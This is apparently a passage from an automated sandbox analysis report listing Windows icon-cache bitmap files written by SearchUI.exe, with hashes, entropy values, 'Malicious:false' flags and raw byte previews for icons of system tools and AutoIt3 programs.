                                                                            Entropy (8bit):6.145995148273184
                                                                            Encrypted:false
                                                                            SSDEEP:48:BjKwH9dvJFNmQEJ4p23gE4OzjTHTWIzeHcgv3JJ5f/S4VseYtpOe8xo2jJLgTek:BxHHnYQE2lmzjLt4J5nS4mF52jhe
                                                                            MD5:18724742ACF033383C5E3D764B0544FA
                                                                            SHA1:67DD5C314315AE7917C63E59186754508D5A8667
                                                                            SHA-256:D917BF4AB20F41D79A5A7AE1ABE2F1C1D0C32713F9DC8B6628D1C7B055B97B33
                                                                            SHA-512:35247969C929DB6D1BE013482CDE98AA20662F553E6CFC74E42E40E0B30BF25920196E32BCFCCE6F558056ACB79C55039C053AA072BCC1E686267DD5FC277B5A
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW.........................................................................................................................................,..:..A..?..4..%..........................................................................................!...O..s..{..z...u..q..i...`..Y..J..@........................................................................8..}....................................r..N..?..3.......................................................................q...n...p...v...}.......................m..<..?.............................................6............]...R...W...[..._...e...k...s...{........................H..=......................................^..........\...D...I...L...L...M...O...T...Y...`...h...s...}......................J..?..............................E..........P...>...D...D...C...C...C...E...H...M...R...Y...d..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_dfrgui_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.052526408399854
                                                                            Encrypted:false
                                                                            SSDEEP:48:ROsWYUiXX5IHauiVAc1cANeojm6i14qyLt49+4mtJtQNv2PPzw8WeTxux:RJWYUCXipiVAcbTjHU4H54of0unzZTY
                                                                            MD5:840E9B50C5995D52FB0983CD357540C9
                                                                            SHA1:CB26F4EDE03144AFB860F85CD11722AEE42CBEA3
                                                                            SHA-256:030F22E0F9DEE6ADDE03838466ABDC601389A2C0651243BCB4D42B005436E66B
                                                                            SHA-512:54ADCCABB46E085F51638B9C5808A85C4CC491FB346AC96D7939CF8AE0195CDFBBD1B96ACB87A9B6D1328B8A82C4D3CEDE0B7FA1C400BD995FEA3FA87C96E5D3
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW........................................................................................................................................ff.K\\..CCp.%%X...E...U.PP}.GGUV...*........................................................................mm..vv.:cc.s==..1/....}...................l...I.01d.hfsn...?...=...8...)................................................nn.Xff.96..........!...'%..0...43..86..0/....j...q...[...R.kI..=q.oO\`...8...3..."...............................Hzx.wFC.'&......!...0...=<..@>..@=..B@..MK..[Z..he..KI........x...Y...M.v........&d.s.....-...'.......................7<<......" ..54..GE..NL..RO..XT..`\..nl......................WZ....{...m...i...N..3........N.zD.....&... ........................IG..XW..`_..cb..ol...|..........................ww..eb.._Vc..VC..W...E..&.W...e..K........T..@..............................'&..mi..pn..yv......................yy..^S..X/u.`.3.t.'..L...c...c../..{
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_iscsicpl_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.088453059467796
                                                                            Encrypted:false
                                                                            SSDEEP:48:ZiAnElxq8KP7+u56i5E83wq8YDsQJ3bNaCnDsIcI5fPSeybrPqLiTSVUK8Eh3/1M:ZPMxq8KjhQ2VAq6SJakIMHLiGqvKtM
                                                                            MD5:BDEF02CC4A35B22C376A8B49D27F5A84
                                                                            SHA1:13E5858B6B9BEA305DD43DB209DC207983343F3E
                                                                            SHA-256:2EA7836171B129BBEF9F19A8DABDA506FF1CBDD7625031C0C6A6728FA4DB77B3
                                                                            SHA-512:3D6FB07B98E88BDF5A13E67A88FA6AEC587F3D97EEF6CBE95BAF229FE02962F04AD4564A8FAEEE5EE1D752CB33BB32A8345D643A2D2806641873D0AF21957A93
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW................................................................................................................................................................................................................................................................................................................................................................................................................qqU.ync.wlV/obLPh\EkfY@rcV?aaU<?[N6*.wD....................................................................................................'...H..q.........k.tdF.vd<.s_7.bN1...........................................................................................$...C...e..............y..tW.bU=.2-#3....................................................................................fff.....ohb'{tiD..~c.............f.I?............................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msconfig_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.5620136320188625
                                                                            Encrypted:false
                                                                            SSDEEP:48:FaiG004jZZlxpG8ab7526db0E5tUnV11NkwaJmrQythZbbQ8aDBVaX:bGWxobbl26z7UVXNkwaMj/bkD/aX
                                                                            MD5:9186930C3396D7F9C98230FB85E3864D
                                                                            SHA1:D1E3D8CD7F42424B72BEB322DB408EB7CBFF1E22
                                                                            SHA-256:494AAEC6F7938BD17326A7A98894BD65A7C2151A63AF5EF616EF60A1192371E9
                                                                            SHA-512:5A2D99F197970CCE229DE25444BA469EB486843029ADE342652C06F69531E034B2D26B359703A41EBCC687F143AE7340FEE7F501D7CF58F34F7C4C73C9CA9644
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...........................................................................................................................#...V...|...................`|||-...........................................................................................|......................................k...0...........................................................................k....................................................yyyP...................................................................`............................................................{{{....B...5...+....................................................................................................................+++....<...2...$........................................... ....................................................................///u...+.../...!..................................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msinfo32_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.574720537164326
                                                                            Encrypted:false
                                                                            SSDEEP:48:FaiG004AZZaxKGpgbb/e/akwMeQOqlF1XInk/XKwTtQW9mBaZhBVaX:bG8x7F/NwDQOanXInEX7vHZh/aX
                                                                            MD5:DF59B8ED42BD98D68F689A62E1C3D18C
                                                                            SHA1:2B995ADC2673F7DDB2BCCFAE7FB067A3FDEB5065
                                                                            SHA-256:6DC707B804F108D109BE5CAEC28A91E2342B7FA250E991DF91657CB172335F08
                                                                            SHA-512:3E5D05FC624E955777B33C922F79172C03158B6CD355608E65ABD9CB17929EC491E692973B80A7470188F504DE19EE208AD3351DA3C82D0A9ED825695692EC2E
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...........................................................................................................................#...V...|...................`|||-...........................................................................................|......................................k...0...........................................................................k....................................................yyyP...................................................................`............................................................{{{....B...5...+....................................................................................................................+++....<...2...$........................................... ....................................................................///u...+.../...!..................................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_mspaint_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.856666835751707
                                                                            Encrypted:false
                                                                            SSDEEP:48:EqY9q7wzWBgBEd1LIW8a0hLNxX5Lajc0gLHRYJJa0xYKTYy9nva:ERW5n81hHX5LaA0gaJEuyy9
                                                                            MD5:E4E9605070A88A73D9FF9C2C94A1AAD8
                                                                            SHA1:ED40D92E073FBF1617363D73085812132F2B43DE
                                                                            SHA-256:8052102AC0C33CFB06E5FA5B99A4691CB6E1412B11189899378F60F8C06C7F31
                                                                            SHA-512:6E37E28E09A017AA30779819FFD471DBCA40E927C02A43F873C9B801384B30860C090DF0F5143BFA4AD7EC1204BF844AA28B5ACDC35BC6D6CDE97AE0764527E6
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW....................................................................................................................................:..'+..oo0.qU.................................................................................................................?..$1...2}..mP#....................................................................................................................5...)...}nx3.fL...................................................................................U...Uu..R..R..P.Q...P...N.u.../...P~...Gd..U...............................................................................Uu.........................4...1.....p...K...L...J0..................................................................U...X..........................\...;...m...........d...L...I-..............................................................Uu.............................@...,........
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_odbcad32_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.794830085332289
                                                                            Encrypted:false
                                                                            SSDEEP:48:gGTvRlWE2iK5/QfIhWaDEipT5FxHcmIDTGO/S2b7o25mEgbrxVASniS0NR+Svnfz:ZvPW9UCDEETXxHa/zoLE8SEiJ3p
                                                                            MD5:96C4B71837E344480CAE3873F41ACD84
                                                                            SHA1:E9CD6EBE79D6582E3248332193414E81109EF0BF
                                                                            SHA-256:7B97812F16AA171F350925A1BD9CD5FB74CFB023F18DCFE0B5D6916E7CFEE243
                                                                            SHA-512:E08AC6B6CE99F52D3094BFB23D648F29D9A2131E5D7F3C9E8E787FB864DDD14A8313DF14563348C0F2649FAD60F4E17F8742B31576191170B7B9C82B2CA9F58E
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW....................................................................................................................................................ubb.d_U0ng]joh^I....................................................................................................tod0yqfZtma{vod.}uh.~ui.uka..}rr.mm..........................................................................qq.rk]&{sf_~ui..wk..xl.{n..|o..zm..xl.{tg.uka.........d_V8......................................................w...r<.ylR.zm...r..t...u...u...t...s..~q..|o..zn..xl.}vi.uka.............xn........................................4..yk..y...w..z...~...~...}...}...{...y...w...u...s..~r..|p..zn..wk.uka.................UMFE......................~Y..|.............................................}...{...y...u...t...q..}q..zn.uka........................(..........................................................................y...y...z...v...t...s..|
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_printmanagement_msc
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.5201508204213345
                                                                            Encrypted:false
                                                                            SSDEEP:48:lEq0jDiXod9ho/57JGWWzm6NtDza2hc0FUdP6I6lX2wu73IIVJW4:SqQGYd98bctDza2hc0FU4X92lrImJW
                                                                            MD5:AB2CCD14DB6FC49B1AF2069025EF72B0
                                                                            SHA1:636EF695094934A06FB412B5AC1F75394085E615
                                                                            SHA-256:B6CC2051032FBB16625F174A8AC3A8AF544E99114702944BB5697DD3B0347756
                                                                            SHA-512:C4CC2DC322B0785640730F970232B5912E94E990BE8E3EC045580C47B9EC42C90D93FB4B4C3CB689C2FA32A1B176B0BEA5D487A08D618C7E4C5FC3A29E940251
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...................................................................................................&...*...&...............................................................................................................d.o...o...o...j.|...&.........................................................................................................p......#.......%......*.........................................................................................................p..#......4#...%......*...................6...P...9.............................................................................p.......{......%......*....%%%>:77{YY[............."""C...............@...d...Q.................................................p...........e.."_..')*.WWX..............................{&$$.ruu...........#%%....6.........................................p......V...}.........................M..e...|%.......QLL...........
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_psr_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.311504365507399
                                                                            Encrypted:false
                                                                            SSDEEP:48:uBNZ6u475DaODdw7Ib638dQgDzlVH1xizIg3DHWX+H:8NgdZS7Ib/D3HDizIiJ
                                                                            MD5:EA169540ADFB7DA41F5DD22EAC99D0CF
                                                                            SHA1:4CF345571EC4F268D069AC29F79D6D03E1B46D88
                                                                            SHA-256:BAD07B1C37982608A8582B8819B9B59166DB8211704E7506351CC902228CAECC
                                                                            SHA-512:2DCA2464AA7315F6F1833308D0F37F226B949841598D56440837FE9C24A0554D04CDD38E042564E66C77B505C8E56B19C3293580D0F91A69492A202D5E482740
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW............................................................................................................................................................khkNhgh.fdf.ede.ede.fcf.hgh.khkN........................................................................................mmm.fff.zyy.........................yxx.fff.mmm.............................................................................LLL(ddd.........................................cdd.\\\!...............#...&...&...&...&...&...&...&...&...&...&...&...&...&...&___.................................................aaa...........}..........................................................}|.yww................................................yxx.a^aV....................................................................................44......................................eee.................................................................vuv...............
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_quickassist_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):2.0116977638696008
                                                                            Encrypted:false
                                                                            SSDEEP:6:+/qtgX/Cu/a1Opay28FuShBa8a8/QKjaUa0aEa0aEa0aEaa/kKXaOa8aOaEaIaO6:+/qYCu/a1OT2nSrnJbnnTbE
                                                                            MD5:FA60778BCC58D6AFB36E78286B61DBCD
                                                                            SHA1:9293FA0451C384075E3A6707A950DEE94FC17CA8
                                                                            SHA-256:7CB6DE76554847A916551F71F8CFD2E56485AC5C51E48CC564C84E21C9B1AB37
                                                                            SHA-512:4FDEBE052DE2B3678C1F6DE71F835BE2DF572C0D463E68CEA076ADF35C6938B7E7B3529A4094875055F3460DC806B7B17C70858D1769CAF7A02F432335637504
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW.............................................................................x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...`..................................`..x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...........................................x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...x...@................................@..x...x...x
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_services_msc
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.050062546022579
                                                                            Encrypted:false
                                                                            SSDEEP:48:vqHb7RnH5BilE3Ul/JnNbLsRbuBrkJBVA/vQxJvpqdcbWkPNmrc:0J3UXNUkrkTVwQxJBqqbnN
                                                                            MD5:BA031B4BD4AFCFE8D39CA84DF97432C7
                                                                            SHA1:867008C5626908647B9C6BBC9FF891BFDA3E7F12
                                                                            SHA-256:5A96ACB72A7CEA00FEC3DDD5D048E604943AFE16170E67332EC5975083446284
                                                                            SHA-512:BC2F3D3EDD69279A477F32F09FFBCABCECEBCF90D4A413292A4F90F3B4F9B8C523DE14674793B0AC8DDA3065B2FEB3FDB1EE85118C6FC69FCEDF2C4E8CBA8FD9
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW................................................................................................................................................................................................................................................................................................................................................................................................................................=6/Fr[A.A0 ........._H4.jR:....O..................................................................................................q.......I5..M6...~..~.vdN......................................................................................................................B8*............................................................................................[...................................O@/....................................................... .......................z......
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Common Files_Microsoft Shared_Ink_mip_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.106879650519581
                                                                            Encrypted:false
                                                                            SSDEEP:48:RG1+HrubD3MBhAweiTyJPVufM7bcS3k/NW01+479VJycdy94+kgBT8idre:fHrGjahAuTyVVuU7P0/sna9tdy9VCQe
                                                                            MD5:48DB6F33CC5D842CB72410552A63AE0B
                                                                            SHA1:FDA8AAAE704D25FFB5E8358D95AE325922D09127
                                                                            SHA-256:70B5A9F51A317DFA789514EACE4B1F3FA980B88621174251CC6C1B22C1131A01
                                                                            SHA-512:13C9DF56F6E0C52FAB828078A6D8552560D440E2956969281E15B227470A007E95AFBEC14E965E722F60197922B3AA7DE11F9D9CEEA36E93711FF2073DE2DC7C
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW................................................................................................................................................................................................................................................................................................................................................jUU.hSX1jUU0jUU0jUU0jUU0jUU0jUU0jUU0jUU0jUU0jUU0jUU0jUU0jUU0jUU0jUU0jUU0jUU0jUU0fQQ2hSS1hSS1fQQ2fQQ2hSS1hSS1hSS1hSS1kVV2fYY.....d]S.e]S.e]S.e]S.e]S.e]S.e]S.e]S.e]S.e]S.e]S.e]S.e]S.e]S.e]S.e]S.e]S.e]S.e]S.d\R.c[Q.aYP._XN._WN._WN._XN.`YO.bZP.c\R.a]Q.dSS+......................................................................................................................b\Q.dPU3.....................................................................|...v.~yn.toe.kg^.gcZ.gcZ.kg^.soe.}xm...t........c]R.hSS1............................................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Windows NT_Accessories_wordpad_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.075770694809214
                                                                            Encrypted:false
                                                                            SSDEEP:48:eI/X//scH3MbmVb/A4TSiV2QhbMvivtUm:eqX/kcH3MbmV/TVlhx
                                                                            MD5:1A97F950F591CDFC0E7A147777CE19B2
                                                                            SHA1:C795921A4129586E84867A201CA3147D43938BC2
                                                                            SHA-256:B74EDFEFFC0E6FB1054E39C09C15FC452254D4BD53FAF5D947EBB4CFD62A517C
                                                                            SHA-512:4594CA40B718C1A23C61EE3E0D649AC52421F4416EED46716B11FAEE652117549091BE707C2D71160CD7E1597C6F3E3E52411188253C5D4EA43315727AC04422
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW......................................................................................................................................................................................................................................................................................................................................................................."..............................................................................."..........................................\...\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\.._..a..d......................................?..j*...tO..............................................................[....>(...f3..f3..................U....tMO..d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...d...e...g...i...l...o...m.s.......................w3....z...............................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Au3Info_x64_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.906964992469157
                                                                            Encrypted:false
                                                                            SSDEEP:48:yyJv1cZdsqRnRPHDU3SedT8kIltCXjq/My:Zv1cZSyPjU9ikStCzq/
                                                                            MD5:5D7B70550F986FD58C8AF588D9390F92
                                                                            SHA1:729E76EEE747C565041F106878CC71191281B0AD
                                                                            SHA-256:48EBBD5DD1385364FB2FBD2FBE5041F9E06EC88E28155D5BB4CD55F791827D50
                                                                            SHA-512:126A87358816CE860650A63C8F63E1B97FFD35043665A0A77D1B785318ABD88EACDD6293D2E5B1AA91A3280242AC2B371BCFA1D8111CE00570C918013AE4204B
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...........................................................................................................................W.................................W...............................................................................%.........................................................$.......................................................................................................................................................................................$.....................................|...|.......................................$.......................................0.........................e...]...]...]...]...]...]...]...]...e...........................0...............................%.....................g...]...]...]...]...]...]...]...]...]...]...]...]...f.......................%.............................................]...]...]...]...]...]...]...]...]...]...]...]...
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Aut2Exe_Aut2exe_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.906964992469157
                                                                            Encrypted:false
                                                                            SSDEEP:48:yyJv1cZdsqRnRPHDU3SedT8kIltCXjq/My:Zv1cZSyPjU9ikStCzq/
                                                                            MD5:5D7B70550F986FD58C8AF588D9390F92
                                                                            SHA1:729E76EEE747C565041F106878CC71191281B0AD
                                                                            SHA-256:48EBBD5DD1385364FB2FBD2FBE5041F9E06EC88E28155D5BB4CD55F791827D50
                                                                            SHA-512:126A87358816CE860650A63C8F63E1B97FFD35043665A0A77D1B785318ABD88EACDD6293D2E5B1AA91A3280242AC2B371BCFA1D8111CE00570C918013AE4204B
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...........................................................................................................................W.................................W...............................................................................%.........................................................$.......................................................................................................................................................................................$.....................................|...|.......................................$.......................................0.........................e...]...]...]...]...]...]...]...]...e...........................0...............................%.....................g...]...]...]...]...]...]...]...]...]...]...]...]...f.......................%.............................................]...]...]...]...]...]...]...]...]...]...]...]...
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Aut2Exe_Aut2exe_x64_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.906964992469157
                                                                            Encrypted:false
                                                                            SSDEEP:48:yyJv1cZdsqRnRPHDU3SedT8kIltCXjq/My:Zv1cZSyPjU9ikStCzq/
                                                                            MD5:5D7B70550F986FD58C8AF588D9390F92
                                                                            SHA1:729E76EEE747C565041F106878CC71191281B0AD
                                                                            SHA-256:48EBBD5DD1385364FB2FBD2FBE5041F9E06EC88E28155D5BB4CD55F791827D50
                                                                            SHA-512:126A87358816CE860650A63C8F63E1B97FFD35043665A0A77D1B785318ABD88EACDD6293D2E5B1AA91A3280242AC2B371BCFA1D8111CE00570C918013AE4204B
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...........................................................................................................................W.................................W...............................................................................%.........................................................$.......................................................................................................................................................................................$.....................................|...|.......................................$.......................................0.........................e...]...]...]...]...]...]...]...]...e...........................0...............................%.....................g...]...]...]...]...]...]...]...]...]...]...]...]...f.......................%.............................................]...]...]...]...]...]...]...]...]...]...]...]...
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt v3 Website_url
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.237492402645553
                                                                            Encrypted:false
                                                                            SSDEEP:24:cqXjsdB3g6G7OdE5qOppcWfswKnZFwG6uDPvdHk:HsdBg6qjpLkwOEG6QndHk
                                                                            MD5:A9FFA788D43CA6DBFD91F153E8A3974D
                                                                            SHA1:14DF0A56B28F230ED98BC3C0075C9208B41FF807
                                                                            SHA-256:F300BAAE15663E4A4AC43A5BB30A85FCC2E2B40D9B7007A8300873300FCC563B
                                                                            SHA-512:3C5679F8A17180ACC5C22C3A13F00C6D0B13C7EABF37AA27340EBDF2ADF89C376912ADAC8B70C490D5DA97FBEE4F9F6704172D51FCDDF74FF8F8BCC5ABF8C911
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW..................................................................................................................................................................................................................................................................................................................................................................................................................................................~...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt3_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.906964992469157
                                                                            Encrypted:false
                                                                            SSDEEP:48:yyJv1cZdsqRnRPHDU3SedT8kIltCXjq/My:Zv1cZSyPjU9ikStCzq/
                                                                            MD5:5D7B70550F986FD58C8AF588D9390F92
                                                                            SHA1:729E76EEE747C565041F106878CC71191281B0AD
                                                                            SHA-256:48EBBD5DD1385364FB2FBD2FBE5041F9E06EC88E28155D5BB4CD55F791827D50
                                                                            SHA-512:126A87358816CE860650A63C8F63E1B97FFD35043665A0A77D1B785318ABD88EACDD6293D2E5B1AA91A3280242AC2B371BCFA1D8111CE00570C918013AE4204B
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...........................................................................................................................W.................................W...............................................................................%.........................................................$.......................................................................................................................................................................................$.....................................|...|.......................................$.......................................0.........................e...]...]...]...]...]...]...]...]...e...........................0...............................%.....................g...]...]...]...]...]...]...]...]...]...]...]...]...f.......................%.............................................]...]...]...]...]...]...]...]...]...]...]...]...
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt3_x64_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.906964992469157
                                                                            Encrypted:false
                                                                            SSDEEP:48:yyJv1cZdsqRnRPHDU3SedT8kIltCXjq/My:Zv1cZSyPjU9ikStCzq/
                                                                            MD5:5D7B70550F986FD58C8AF588D9390F92
                                                                            SHA1:729E76EEE747C565041F106878CC71191281B0AD
                                                                            SHA-256:48EBBD5DD1385364FB2FBD2FBE5041F9E06EC88E28155D5BB4CD55F791827D50
                                                                            SHA-512:126A87358816CE860650A63C8F63E1B97FFD35043665A0A77D1B785318ABD88EACDD6293D2E5B1AA91A3280242AC2B371BCFA1D8111CE00570C918013AE4204B
                                                                            Malicious:false
                                                                            Preview: BM............|... ... ..... ......................................... niW...........................................................................................................................W.................................W...............................................................................%.........................................................$.......................................................................................................................................................................................$.....................................|...|.......................................$.......................................0.........................e...]...]...]...]...]...]...]...]...e...........................0...............................%.....................g...]...]...]...]...]...]...]...]...]...]...]...]...f.......................%.............................................]...]...]...]...]...]...]...]...]...]...]...]...
